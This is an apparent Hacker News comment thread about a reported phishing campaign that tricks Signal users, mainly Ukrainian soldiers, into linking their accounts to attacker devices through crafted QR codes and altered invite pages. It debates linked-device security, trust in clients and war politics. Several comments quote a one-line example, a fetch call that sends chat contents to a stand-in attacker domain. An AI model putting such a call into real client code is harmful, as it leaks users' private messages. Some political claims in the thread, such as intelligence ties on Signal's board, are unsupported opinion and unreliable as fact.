I'm only surprised it took this long for an in-the-wild attack to appear in open literature.
It certainly doesn't help that signal themselves have discounted this attack (quoted from the iacr eprint paper):
"We disclosed our findings to the Signal organization on October 20, 2020, and received an answer on October 28, 2020. In summary, they state that they do not treat a compromise of long-term secrets as part of their adversarial model"
If I'm reading that right, the attack assumes the attacker has (among other things) a private key (IK) stored only on the user's device, and the user's password.
Thus, engaging on this attack would seem to require hardware access to one of the victims' devices (or some other backdoor), in which case you've already lost.
Correct me if I'm wrong, but that doesn't seem particularly dangerous to me? As always, security of your physical hardware (and not falling for phishing attacks) is paramount.
No, it means that if you approve a device to link, and you later have reason to unlink the device, you can't establish absolutely that the unlinked device can no longer access messages, or decrypt messages involving an account, breaking the forward-secrecy guarantees.
That leaves you with the only remedy for a signal account that has accepted a link to a 'bad device' being to burn the whole account. (maybe rotating safety numbers/keys would be sufficient, i am uncertain there) -- If you can prove the malicious link was only a link, then yeah, the attack i described is incomplete, but the issues in general with linked devices and remedies described are the important bits, I think.
That's not what the attack does tho - they have access to your private key so they can complete the linking protocol without your phone and add as many devices as they want (up to the allowed limit). If you add a bad device, you are screwed from that moment on, assuming you don't sync your chat history.
You can always see how many devices a user has: they have a unique integer id so if I wanna send you a message, I generate a new encrypted version for each device. If the UI does not show your devices properly than that is an oversight for sure, but I don't think it's the case anymore.
Either way, you'd have to trust that the Signal server is honest and tells you about all your devices. To avoid that, you need proofs that every Signal user has the save view on your account (keys), which is why key transparency is such an important feature.
It sounds like all that's needed is a device that had been linked in the past. Unlinking doesn't have the security requirements you'd think it would and there's a phishing attack to make scanning a QR code trigger a device link (which seems really really bad if the user doesn't even have to take much action)
Your phone (primary device) and the linked ones have to share the IK since that is the "root of trust" for you account: with that you generate new device keys, renew them and so on.
Those keys are backed by Keystore on Android, and some similar system on Windows/Linux, i'd assume the same for MacOS/iOS (but I don't know the details) so it's not as simple as just having access to your laptop, they'd need at least root.
Phishing is always tricky, probably impossible to counter sadly - each one of us would be susceptible at the wrong moment.
I think the point is that as a user you expect revocation of trust to protect you going forward, yet it doesn’t (e.g. the server shouldn’t be forwarding new messages to). That’s a design decision Signal made but clearly it’s one that leaves you open to harm. Moreover, it’s a dangerous decision because after obtaining the IK in some way (e.g. stolen device) you’re able to then essentially surreptitiously take over the account without the user ever knowing (i.e. no phishing needed). As an end user these are surprising design choices and that Signal discounted this as not part of their threat model to me suggest their threat model has an intentional or unintentional hole; second-hand devices that aren’t wiped are common & jail breaks exist.
This isn’t intractable either. You could imagine various protocols where having the IK is insufficient for receiving new messages going forward or impersonating sending messages. A simple one would be that each new device establishes a new key that the server recognizes as pertaining to that device and notifications are encrypted with a per-device key when sending to a device and require outbound messages to be similarly encrypted. There’s probably better schemes than this naive approach.
Revocation of trust is always a tricky issue, you can look at TLS certificates to see what a can of worms that is.
The Signal server does not forward messages to your devices, and the list of devices someone has (including your own) can and has to be queried to communicate with them, since each device will establish unique keys signed by that IK, so it isn't as bad as having invisible devices that you'd never aware of. That of course relies on you being able to ensure the server is honest, and consistent, but this is already work in progress they are doing.
I think most of the issue here doesn't lie in the protocol design but in (1) how you "detect" the failure scenarios (like here, if your phone is informed a new device was added, without you pressing the Link button, you can assume something's phishy), (2) how do you properly warn people when something bad happens and (3) how do you inform users such that you both have a similar mental model. You also have to achieve these things without overwhelming them.
I would be surprised if there aren’t ways to design it cryptographically to ensure that an unlinked device doesn’t have access to future messages. The problem with how Signal has designed it is that is a known weakness that Signal has dismissed in the past.
“Just install this chrome browser extension” is all it takes now. Hell, you can even access cookies and previously visited sites from within the browser. All it takes is some funky ad, or chrome extension, or some llama-powered toolbar to gain access to be able to do exactly that.
Background services on devices has been a thing for a while too. Install an app (which you grant all permissions to when asked) and bam, a self-restarting daemon service tracking your location, search history, photos, contacts, notes, email, etc
The attack in that paper assumes you have compromised the user's long term private identity key (IK) which is used to derive all the other keys in the signal protocol.
Outside of lab settings, the only way to do that is:
- (1) you get root access to the user's device
- (2) you compromise a recent chat backup
The campaign Google found is akin to phishing, so not as problematic on a technical level. How do you warn someone they might be doing something dangerous in an entire can of worms in Usable Security... but it's gonna become even more relevant for Signal once adding a new linked device will also copy your message history (and last 45 days of attachments).
About the paper: if someone has gotten access to your identity (private) key, you are compromised, either with their attack (adding a linked device) or just getting MitM'ed and all messages decrypted. The attacker won.
The attack presented by Google is just classical phishing. In this case, if linked devices are disabled or don't exist, sure, you're safe. But if the underlying attack has a different premise (for example, "You need to update to this Signal apk here"), it could still work.
One thing I'm realizing more and more (I've been building an encrypted AI chat service which is powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. I mean end of the day you can put a one-line fetch/analytics-tracker/etc on the rendering side and everything your protocol claimed to do becomes useless. That even goes further to the OS that the rendering is done on.
The last bit adds an interesting facet, even if you manage to open source the client and manage to make it verifiably buildable by the user, you still need to distribute it on the iOS store. Anything can happen in the publish process. I use iOS as the example because its particularly tricky to load your own build of an application.
And then if you did that, you still need to do it all on the other side of the chat too, assuming its a multi party chat.
You can have every cute protocol known to man, best encryption algorithms on the wire, etc but end of the day its all trust.
I mention this because these days I worry more that using something like signal actually makes you a target for snooping under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop I'd focus my resources on Signal users, they have the most to hide.
Sometimes it all feels pointless (besides encrypted storage).
I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
You will always have to root your trust in something, assuming you cannot control the entire pipeline from the sand that becomes the CPU silicone, through the OS and all the way to how packets are forwarded from you to the person on the other end.
This makes that entire goal moot; eliminating trust thus seems impossible, you're just shifting around the things you're willing to trust, or hide them behind an abstraction.
I think what will become more important is to have enough mechanisms to be able to categorically prove if an entity you trust to a certain extent is acting maliciously, and hold them accountable. If economic incentives are not enough to trust a "big guy", what remains is to give all the "little guys" a good enough loudspeaker to point distrust.
A few examples:
- certificate transparency logs so your traffic is not MitM'ed
- reproducible builds so the binary you get matches the public open source code you expect it does (regardless of its quality)
- key transparency, so when you chat with someone on WhatsApp/Signal/iMessage you actually get the public keys you expect and not the NSA's
I agree. Perhaps it's why I find the discussions like nonce-lengths and randomness sources almost insane (in the sense of willfully missing the forrest from the trees). Intelligence agencies have managed to penetrate the most secretive and powerful organizations known to man. Why would one think Signal's supply chain is impervious? I'd assume the opposite.
But depending on your threat model, it can still be useful. If a state actor has a backdoor into something, would they burn that capability to get you? If you are a dissident in a totalitarian government, you would expect them to throw everything at you and not tell anyone how/why. If you are terrorizing and could be tried in a “classified” setting, you would expect them to throw everything at you. If you are Jane Average passing nudes and talking about doing a little Molly last weekend and would have a lawyer go through discovery, you are probably safe.
I don't think they are insane, they are quite useful when designing security mechanisms, while at the same time being utter noise for the end-user benefiting from that system.
> If you're building a chip to generate prime numbers I do surely hope you know how to select randomness or make constant time & branch free algorithms, just like an engineer designing elevators better know what should be the tensile strength of the cable it'll use. In either cases, it's mumbo jumbo for me, and I just need to get on with my day.
Part of what muddies the water is our collective inability to separate the two contexts, or empower tech communicators to do it. If we keep making new tech akin to esoteric magic, no one will board the elevator.
I almost find it worse. Using your analogy its akin to doing atomic simulations on the elevator cable quality, but the elevator car is missing a bottom/floor.
I agree with you that the cart seems to be moving ahead of the horse, in that there is an increasing fixation on the theoretical status of the encryption scheme rather than the practical risk of various outcomes. An important facet of this is that systems that attempt to be too secure will prevent users from reading their own messages and hence will induce those users to use "less secure" systems. (This has been a problem on Matrix, where clients have often not clearly communicated to users that logging out can result in permanently missed messages.)
There's a part of me that wonders whether some of the more hardcore desiderata like perfect forward secrecy are, in practical terms, incompatible with what users want from messaging. What users want is "I can see all of my own messages whenever I want to and no one else can ever see any of them." This is very hard to achieve. There is a fundamental tension between "security" and things like password resets or "lost my phone" recovery.
I think if people fully understood the full range of possible outcomes, a fair number wouldn't actually want the strongest E2EE protection. Rather, what they want are promises on a different plane, such as ironclad legal guarantees (an extreme example being something like "if someone else looks at my messages they will go to jail for life"). People who want the highest level of technical security may have different priorities, but designing the systems for those priorities risks a backlash from users who aren't willing to accept those tradeoffs.
At a casual glance, any E2EE system can be reduced to your ironclad legally guaranteed (ILG) system by having the platform keep a copy of the key(s), for instance. So it doesn't have to be a one-or-the-other choice.
Building anything that's meant to be properly secure - secure enough that you worry about the distinction between E2E encryption and client-server encryption - on top of iOS and Google Play Services is IMO pretty pointless yes. People who care about their security to that extent will put in the effort to use something other than an iPhone. (The way that Signal promoters call people who use cryptosystems they don't like LARPers is classic projection; there's no real threat model for which Signal actually makes sense, except maybe if you work for the US government).
> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
There's definitely a streetlight effect where academic cryptography researchers focus on the mathematical algorithms. Nowadays the circle of what you can get funding to do security research on is a little wider (toy models of the end to end messaging protocol, essentially) but still not enough to encompass the full human-to-human part that actually matters.
> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
I think your comment in general, and this part in particular, forgets what was the state of telecommunications 10-15 years ago. Nothing was encrypted. Doing anything on a public wifi was playing russian roulette, and signal intelligence agencies were having the time of their lives.
The issues you are highlighting _are_ present, of course; they were just of a lower priority than network encryption.
I think that part of what you are talking about is sometimes called "attestation". Basically a signature, with a root that you trust that confirms beyond doubt the provenience of the entity (phone + os + app) that you interact with.
Android has that and can confirm to a third party if the phone is running for example a locked bootloader with a Google signature and a Google OS. It's technically possible to have a different chain of trust and get remote parties to accept a Google phone + a Lineage OS(an example) "original" software.
The last part is the app. You could in theory attest the signature on the app, which the OS has access to and could provide to the remote party if needed.
A fully transparent attested artifact, which doesn't involve blind trust in a entity like Google, would use a ledger with hashes and binaries of the components being attested, instead of root of trust of signatures.
All of the above are technically possible, but not implemented today in such a way to make this feasible. I'm confident that with enough interest this will be eventually implemented.
I'll feel pessimistic like this, but then something like Tinfoil Chat [0] comes along and sparks my interest again. It's still all just theoretical to me, but at least I don't feel so bad about things.
With a little bit of hardware you could get a lot of assurance back: "Optical repeater inside the optocouplers of the data diode enforce direction of data transmission with the fundamental laws of physics."
> "E2E encryption" really requires the client to be built and verified by the end user
But the OS might be compromised with a screen recorder or a keylogger. You'd need the full client, OS and hardware to be built by the end user. But then the client that they're sending to might be compromised... Or even that person might be compromised.
At the end of the day you have to put your trust somewhere, otherwise you can never communicate.
It’s primarily to guard against insider threats - E2E makes it very hard for one Signal employee to obtain everyone’s chat transcripts.
Anyone whose threat model includes well-resourced actors (like governments) should indeed be building their communications software from source in a trustworthy build environment. But then of course you still have to trust the hardware.
tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.
> tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.
This is sorta my point, lots of DC folks use Signal under the assumption they're protected from government snooping. Sometimes I feel like it could well have the opposite effect (via the selection bias of Signal users).
It is not plainly stated in the article, but as far as I understand, the first step of one of the attacks is to take the smartphone off a dead soldier’s body.
The article says they phish people into linking adversarial devices to their Signal:
> [...] threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, [...]
It raises questions about smartphones being standard equipment for soldiers, but they do give every soldier an effective, powerful computing and communication platform (that they know without additional training).
The question is how to secure them, including against the risk described in the parent. That seems like a high risk to me I would expect someone is working on how to secure them enough that even Russian intelligence doesn't have an effective exploit.
The solutions may apply well to civilian privacy too, if they ever become more widespread. It wouldn't be the worst idea to secure Ukrainian civilian phones against Russian attackers.
> Encrypted milspec comms aren’t the standard in a massive war.
It is standard in any modern military that is actually prepared for war. It's not like encrypted digital radio is some kind of fancy tech, either - it's readily available to civilians.
Ukraine in particular started working on a wholesale switch to encrypted Motorola radios shortly after the war began in 2014, and by now it's standard equipment across their forces. Russia, OTOH, started the war without a good solution, with patchwork of ad hoc solutions originating from enthusiasts in the units - e.g. https://en.wikipedia.org/wiki/Andrey_Morozov was a vocal proponent.
But smartphones are more than communications. You can also use them as artillery computers for firing solutions, for example. And while normally there would be a milspec solution for this purpose, those are usually designed with milspec artillery systems and munitions in mind, while both sides in this war are heavily reliant on stocks that are non-standard (to them) - Ukraine, obviously, with all the Western aid, but Russia also had to dig out a lot of old equipment that was not adequately handled. Apps are much easier to update for this purpose, so they're heavily used in practice (and, again, these are often grassroots developments, not something pushed top-down by brass).
Russians aren't allowed to bring phones on the frontlines apparently but Ukranians often do still as they have the combat management app which is critical to operations. I've always wondered if this is why there's far more published footage of Ukranian combat video than Russian. Beyond the donation incentive they attached to videos when publishing them on Youtube/Telegram.
> I've always wondered if this is why there's far more published footage of Ukranian combat video than Russian.
I'm sure Russia's meat wave tactics have more of a role. If you're sending your troops in suicide missions, including guys without weapons and even in crutches, you're not exactly too keen in having them carrying mobile phones to document the experience or even, heavens forbid, survive by surrendering.
Are you sure it's a meme, though? There is plenty of footage out there, documenting meat wave tactics in 4k. Have you been living under a rock?
> Again ,if Ukrainians are being beaten by guy in crutches (...)
What's your definition of "being beaten"? Three years into Russia's 3-day invasion of Ukraine and Ukraine started invading and occupying Russian territory. Is this your definition of being beaten?
I think a large chunk of the footage is taken by gopros or similar, not smartphones.
And I think a pretty much all published Ukrainian and Russian combat footage is vetted by their respective military (who would want to be court martialed for Reddit karma?).
They just take different approaches to what, when and were to release the footage.
A radio on a soldier is already a dangerous communications device - with a radio you can call in artillery strikes, for example.
There's no particular need IMO to secure smartphones on the battlefield in anyway beyond standard counter-measures - i.e. encrypt the storage, use a passcode unlock.
That's referring to people literally posting selfies online (with the result of giving away their location by either metadata or geo-guessing).
Which is a process and procedure issue, more then a security issue on the phones themselves (except in so far as it's really obvious there's a solid need for an OS for a battlefield device which strips all that stuff out by default).
Is this suggesting that a single QR scan can on its own perform the device linking? If so, it seems like that's kind of the hole here, right? Like you shouldn't be able to scan a code that on its own links the device; you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)
> you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)
Remember that Signal is designed for non-technical users. Many/most do not understand QR codes, links, linking, etc, and they do not think much about it. They take an immediate, instinctive guess and click on something - often to get it off the screen so they can go back to what they were doing.
Do you have reason to think there is not confirmation? Maybe Signal's documentation will tell you.
> Do you have reason to think there is not confirmation?
The reason is just that in the article it says:
> threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance
That phrasing suggests to me that the scanning of the QR code, on its own, performs the linking. That may not be the case, but if so I'd say the wording is misleading or at least imprecise.
In fairness, I think it's misleading to you due to the details you are interested in. They don't say otherwise and they can't lay out every detail that anyone might be interested in; it's not an RFC.
Not the person you replied to, but I just tried googling half a dozen different terms and got results that have nothing to do with Signal.
> Remember that Signal is designed for non-technical users.
That does not prevent them from putting up a warning message that says "You just scanned a code which will allow another device to read all future messages sent to you, and send messages from your identity. Are you sure you want to do that? And the button says "link devices", not "yes" or "no."
I think the frustration here is that Signal petulantly and paternalistically refuses to allow you to fully sync to another device (and for years refused to even allow you to back up messages) because supposedly we can't be trusted with such a thing...but then they leave the QR code system so idiotically designed it's apparently trivial to phish people into linking their devices to malicious actors?
Why the fuck does scanning a QR code, without having first selected "link device", even open that dialog? Or require a PIN code they obsessively force us to re-enter all the time?
It's obviously ripe for abuse.
We admonish people for piping a remote document into their shell but a QR code that links devices with one click is OK?
> That does not prevent them from putting up a warning message that says "You just scanned a code which will allow another device to read all future messages sent to you, and send messages from your identity. Are you sure you want to do that? And the button says "link devices", not "yes" or "no."
As an experiment, I just linked a device to my Signal account. After clicking "Link new device" in Signal, and then scanning the QR code, a dialog popped up: "Link this device? This device will be able to see your groups and contacts, access your chats, and send messages in your name. [Cancel] [Link new device]"
If I scan the QR code with Google Lens instead, it reads and displays the sgnl://linkdevice... URL but does not launch (or offer to launch) Signal.
There are many voices which try to tell you that signal is compromised. Notice that all of those voices have less open-source-ness than Signal in virtually all cases.
Signal is doing its best to be a web scale company and also defend human rights. Individual dignity matters.
> There are many voices which try to tell you that signal is compromised.
But compromised by whom? Russian, US Intelligence? I am really confused.
I just looked quickly on on the Signal Foundation website and the board members, I read things like:
> Maher is a term member of the Council on Foreign Relations, a World Economic Forum Young Global Leader, and a security fellow at the Truman National Security Project.
> She is an appointed member of the U.S. Department of State's Foreign Affairs Policy Board
> She received her Bachelor's degree in Middle Eastern and Islamic Studies in 2005 from New York University's College of Arts and Science, after studying at the Arabic Language Institute of the American University in Cairo, Egypt, and Institut français d'études arabes de Damas (L'IFEAD) in Damascus, Syria.
Those type of people sound part of the intelligence world to me. What exactly are they doing on the board of Signal (an open source messaging app)?
And Telegram specifically bad here. Using custom crypto on custom protocol and dont have any E2EE by default whatsoever storing everything on server in plain text.
Also, it's a tricky environment of disinformation generally, and in particular for anything valuable like Signal. If Signal is secure, attackers on privacy would want people to believe Signal is compromised and to use something else. If it's not, then they would want people to believe Signal is secure.
I think the solution is to completely ignore any potential disinfo source, especially random people on social media (including HN). It's hard to do when that's where the social center is - you have to exclude yourself. Restrict yourself to legitimate, trusted voices.
I would also read it from another perspective. Attackers, especially at the level of nation states, will always try to get as many avenues for achieving their goals as possible.
If you have compromised a service, it would be in your interest to make it more popular (assuming you think you are the only one in possession of it).
If you cannot, you don't give up; you just go back to the drawing board (https://xkcd.com/538/). Maybe I don't need to break Signal if I can just rely on phishing or scare tactics to get what I want.
I wonder if Signal should expose linked devices directly in the UI at all times. Something like a small icon that indicates "You have 3 linked devices active" or similar.
Showing a big snackbar when a new device is added is probably enough, especially if the app can detect there was no "action" on your phone that triggered it.
Key transparency, once rolled out, would help to ensure there is no lingering "bad" device around, but phishing will always be a problem.
Snackbar isn't a particularly new term, it goes back, IIRC, to the first version of Material Design and is similar to a toast but different in that snackbars may support interaction whereas toasts are non-interactive.
I think the trouble is information overload is a bit of a thing in this case. It's information that is 99% of the time useless, except the one time it isn't. But also, to an informed user is much less of a threat - the threat is anyone you interact with getting compromised.
EDIT: Like an analytics based approach would probably be far more useful - popping up a confirmation for example if GeoIP shows a device is far removed from all the others, which for most people would be true unless they were traveling.
They provided some domains, but not all of them are taken. For example, signal-protect[.]host is available, kropyva[.]site is available, signal-confirm[.]site is registered in Ukraine. Some of them are registered in Russia.
Never trust a country at war—any side. Party A blames B, Party B blames A, but both have their own agenda.
The WHOIS is usually fake made up data so don't know why you are using that to claim it's registered in Ukraine. Russia is also known to use stolen credentials, SIM cards etc. from their neighbouring countries, including Ukraine, for things like this.
Then why should I trust the article at all? If WHOIS data is fake and stolen credentials are common (which I don't disagree with), I could register a domain, put your name on it, and make it look like you're behind the phishing. Would that make it true? After all, in war, deception is a legitimate tactic.
I believe you are making a mistake by thinking that since a malicious actor's domain is registered in Ukraine, it automatically must be doing something in the interests of Ukraine, or at least be known to its officials.
Lots of Russian state actors have no problems working from within Ukraine, alas. Add to this purely chaotic criminal actors who will go with the highest bidder, territories temporarily controlled by Russians that have people shuttle to Ukraine and back daily, and it becomes complicated very quickly.
Fair point. Just because a domain is registered in Ukraine doesn't mean it's acting in Ukraine's interests. But that works both ways. If Russian actors can operate from Ukraine, then Ukrainian actors (or others) can also operate from Russia, or at least make it look that way. Cyber attacks originating from Ukraine and targeting Russia aren't uncommon either, which only adds to the complexity of attribution.
The issue isn't just attribution but also affiliation. When similar attacks come from Ukraine targeting Russia, Google stays quiet. I understand that Russia invaded Ukraine, not the other way around, but given the complexity of the conflict, aligning with one side in cyber warfare reporting is a questionable move. At the end of the day, attacks will come from both sides - it's a war, after all.
Edit: when I say 'questionable move', I'm specifically referring to Google. It's unclear what they were trying to achieve with this article, is it a political statement or just a marketing piece showcasing how good GTIG is? Or both?
Ukrainian military are moving from Telegram, which presumably still has some ties to Russia despite the claims. And this is yet another phishing campaign in Ukrainian language that makes use of Ukrainian-registered domains to host fake Signal group invites to make Ukrainian military join and link their devices to an adversary-controlled machine. Who might be behind that attack? Hmm, let me think... I don't know! Probably Ukrainians themselves. Or it might be the US. Might as well be the Martians. We will never know the real truth, after all nobody is to be trusted during the war!
Stop the tiresome FUD please. This war is surprisingly straightforward by the standards of the last century, it's literally out of some decades-old textbook. Let's not drag this discussion here again. If you have specific issues with Google's attribution here, please state them, HN is pretty aware that attribution can be shaky. My only gripe with the article is the clickbait title: nobody says that someone is "targeting e-mail" about e-mail phishing.
> In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.
In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.
> Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.
Ironic, coming from Google. As Android is THE only OS where usage of alphanumeric passwords is nearly impossible, as Android limits the length of a password to arbitrary 16 characters, preventing usage of passphrases.
Am I reading this right? You can initiate device linking in Signal by clicking on an external URL? This is so stupid, I don't even have words for this. In a security-focused app you should not be able to link anything, without manually going into the devices/link menu and clicking "link new device".
If somehow, the victims phone provider can be compromised or coerced into cooperating, the government actor can intercept the text message Signal and others use for verification and set up the victims account on a new device.
It's very easily done if the victim is located in an authoritarian county like Russia or Iran, they can simply force the local phone provider to co-operate.
> government actor can intercept the text message Signal and others use for verification and set up the victims account on a new device
Yes, but if they only control the phone number, you they will register a new account (different cryptographic keys) for you, which is why everyone previously chatting with you will get that "Your Safety Number with Bob changed" message.
tldr: they mostly use phishing with fake ukrainian army group invites to trick people (from ukrainian army) to link the phone device to a attacker-controlled PC.
Also they try to get the actual database SQL files from Windows devices and Android devices.
the only people that think it is bad are people who have a different opinion and feel attacked for whatever reason. I find it telling when people accuse others of virtue signaling because it is almost always someone who is jealous or insecure attacking said signaler.
"Virtue signaling" in theory means "talking the talk without walking the walk", but it's generally thrown out by people who make no effort to assess whether the person criticized is walking the walk or even in contradiction of such evidence.
Driving an economically efficient car -- choosing any sort of car -- has enormous consequences on one's life, for example. Choosing to by a particular car isn't a decision made lightly. But Prius drivers back in the day were accused of virtue signaling, as though the Prius were equivalent to a temporary tattoo.
In fact, speaking of temporary tattoos, simply having a bumper sticker advocating for animal rights, say, belief in anthropogenic climate change, or peace in the Middle East will expose one to regular displays of hostility and aggression, so it isn't a cheap signal.
In other words, in my experience your observation is spot on.
> "Virtue signaling" in theory means "talking the talk without walking the walk"
Virtue signaling means sending deliberate signals about your virtues, whether you "walk the walk" or not. People are often critiqued for going to uncomfortable lengths to signal their virtues, but something as simple as a "meat is murder" shirt or a MAGA hat is also virtue signaling.
How do you tell that to them in the first place? You got someone's phone number. The person who gives it to you tells them that they use whatsapp. You can't even tell them "Sorry I only use Signal" unless you open whatsapp app.
You realise you could use that phone number to...call them and let them know? Also - in what situation are they giving you a phone number and telling you they use WhatsApp but you having no way to respond when receiving that info? If it's in person you can explain at the time. If it's taken from a website, call them. Or you can even fall back on SMS.
Presumably at the time they've given you their phone number, they've told you that they are on WhatsApp, and then you've responded directly that you're only on Signal.
If there is a communications channel by which they can give you their phone number, you can use that same channel to discuss what messenger to use.
Take time with the people to do the boring stuff on their phone/computer:
- install [the thing]
- start it, show how it works
- search for yourself, start a convo, exchange messages
- add them to the group
IME the friction comes from having to do the first step, because it's really an annoyance no one cares about, so if you take it for yourself and do it they'll like that
I usually tell people, "It's like iMessage, but it works on iPhone and Android," or "Hey, if you download Signal we can send high-quality photos between Android and iPhone."
My (non-technical) Mom actually got my whole extended family on Signal with a group link. Since there's no real account creation it was painless. It's how we do all video calls/photo sharing/chat now.
I helped an especially non-technical user install Signal and they didn't need my help at all. They were using it in a minute - download from the app store, transcribe a code from a text message, and you're in - and it worked just like legacy text and phone.
I'd tell them that - just download it and you'll be texting me in a minute, and now nobody is tracking everyone you talk to.
On Signal, unless there is a some bug or outright fraud, afaik they cannot - that is one of their fundamental goals, and they did a lot of work to develop communication technology that worked without revealing that metadata.
(Of course, if someone gets access to your phone, then they know who you are talking to.)
That kind of meta data is not stored by signal as far as I know.
But yes, data stream between two end points can be linked to communicating with each other.
I've still got Signal installed, but never use it, I only ever ended up chatting on it with a few ex-colleagues, who were fellow devs / nerds.
I have so many WhatsApp group chats (here in Australia) that are critical for me these days, and that I don't control, and that have way too many people, and way too diverse a range of people, for me to have any hope whatsoever of migrating them all to Signal. School parents group chats (one for each class that my kids are in). Strata (aka Home Owners Association) committee group chat. Scouts group chat. Various friends groups chats. Boycotting WhatsApp is not an option for me, it would literally make me unable to function in a number of my day-to-day responsibilities.
Group stories are great fun and a feature I seriously miss on Whatsapp. They work well from meme chats to family groups.
There being a killer feature that Whatsapp users are missing out on won't convince everyone but it sure makes me feel less like a nerd when encouraging the switch to Signal.
I find it quite funny that such an obvious feature likely hasn't been added to Whatsapp yet because Meta thinks Instagram is for stories. That's pure speculation on my part though
I've had good luck just asking for it, even with group chats (though admittedly my friends are mostly technical and more privacy conscious than the average person). Usually it's a switch from FB Messenger and I just say that I don't want to be locked into Facebook anymore.
I thought they recorded the metadata - who talks to who and when. (For the uninitiated, that is as valuable or more valuable than the message contents.)
It isn't a viewpoint. It's a fact. I'm using signal for almost a decade now and only managed to get a dozen or so people to use it in any capacity. Most keep using whatsapp as their primary method of communication anyway.
Maybe you should? It might help improve your reading comprehension. The person you're responding to said that most normal people don't care enough to switch to a vastly less popular app, which is obviously true.
My Signal experience: ex gf in college asks what app I’m using to text. Tell her it’s Signal, E2EE, messages are only stored on her phone and nobody else can read them. She says cool and downloads the app. Four months later her phone breaks.
“Hey subjectsigma I got my new phone today. Where are all my messages?”
“… Do you have your old phone? That’s the only place they are.”
“No? Last time I got a new phone WhatsApp moved my messages over, and WA is E2EE so I thought it worked the same way.”
“Nope if you don’t have a backup or your old phone they’re gone. Sorry.”
“This is bullshit. Why does anyone use Signal. I can’t believe it deleted all my messages. I’m uninstalling it. Etc etc.”
It only works for WhatsApp if you have Backup to Google activated[1]. I once tried to work with backuped files from my old phone and it didn't work. (Older tutorials indicated that it once worked, though.)
[1] There was a time WhatsApp had a nag-screen if you hadn't Backup to Google activated. So I guess most people would have eventually caved.
That nag-screen is still there, it pops up roughly every three months for me (though not on my primary phone, Whatsapp won't get anywhere near that one).
Russia fucking up the worlds stuff this decade will be the material for history books. The are actively breaking Europe and almost noone seems to care.
If Europe is what it claims to be: an enlightened democracy with progressive intelligent populace it can not be broken by demented crap messages from twitter.
If however it is fucked up and on a brink of collapse then sure. Little nudge can steer it into "right" direction. but then who is guilty in a first place.
That's part of the propaganda. Please ignore the Internet Research Agency's massive army of troll farms and bots. Please ignore that they controlled half of the largest American Facebook groups catering to racial identity or religion. Nothing to see and no impact.
I'm not going to psychoanalyse the brain parasite, but I imagine that the reason to do it could be as petty as shadow banning people with Fediverse (e.g. mastodon) handles in their bios shortly after he took over.
Only signal.me links were blocked as far as I understood. Other signal links kept working. (I have no first hand knowledge as I left Twitter when the owner changed)
Unrelated most likely, signal.me is a legitimate domain used by Signal. Doubt twitter is so on top of Threat Analysis when they fumbled their own redirects from twitter.com to x.com for a while.
Not really, the domain block was reportedly due to increased spam activity from that domain and performed automatically, so it would follow that a write up would come a few days later. That is if they are related, which is not a given.
It’s still a social media platform, not every action taken is some nebulous part of Musks agenda. Odds are there was an influx of posts that qualify as spam from the signal.me domain that were marked by an automatic system as spam, because they were. Suggesting otherwise is baseless speculation.
Given that Musk has deliberately blocked links to whole other domains before for extremely petty reasons, I don't see why we should give him the benefit of the doubt.
Alphabet is working in tandem with the Ukrainian SBU? Interesting choice, just as the US President has called Zelensky a dictator (and for good reason, Poroshenko, the previous Ukrainian president, has basically said the same thing a few days ago). I wonder how long the Alphabet higher-ups will allow this thing to unfold, or maybe they're not so good at reading the geopolitical tea leaves.
> US President has called Zelensky a dictator (and for good reason, Poroshenko, the previous Ukrainian president, has basically said the same thing a few days ago)
You can't be serious that you consider that to be a good enough reasoning.
Zelensky's support / approval rating is well over 50% (according to polls). Zelensky defeated Poroshenko, getting 73% of the vote in the 2019 election.
And yet he still felt the need to start politically repressing Poroshenko with sanctions and branding him a traitor, that's the mark of having a dictator in command of things.
They're calling Zelensky a dictator because his term was originally scheduled to end in 2024 unless re-elected, and there were no elections since the beginning of the war.
The problem with this assertion is that Ukraine has "no elections under martial law" written into the law. Zelensky himself actually wanted to do some kind of election to reinforce his mandate while his support was still very high, but there was serious concern from the liberals about those plans on the basis that any election held under martial law, with large numbers of people mobilized to fight, 20% of the country occupied, and many millions of refugees unable to vote, would hardly be free and fair. Their pushback scuttled any plans for the parliament to amend said law.
Unrelated most likely, signal.me is a legitimate domain used by Signal. Doubt twitter is so on top of Threat Analysis when they fumbled their own redirects from twitter.com to x.com for a while.
Signal (and basically any app) with a linked devices workflow has been risky for awhile now. I touched on this last year (https://news.ycombinator.com/context?id=40303736) when Telegram was trash talking Signal -- and its implementation of linked devices has been problematic for a long time: https://eprint.iacr.org/2021/626.pdf.
I'm only surprised it took this long for an in-the-wild attack to appear in open literature.
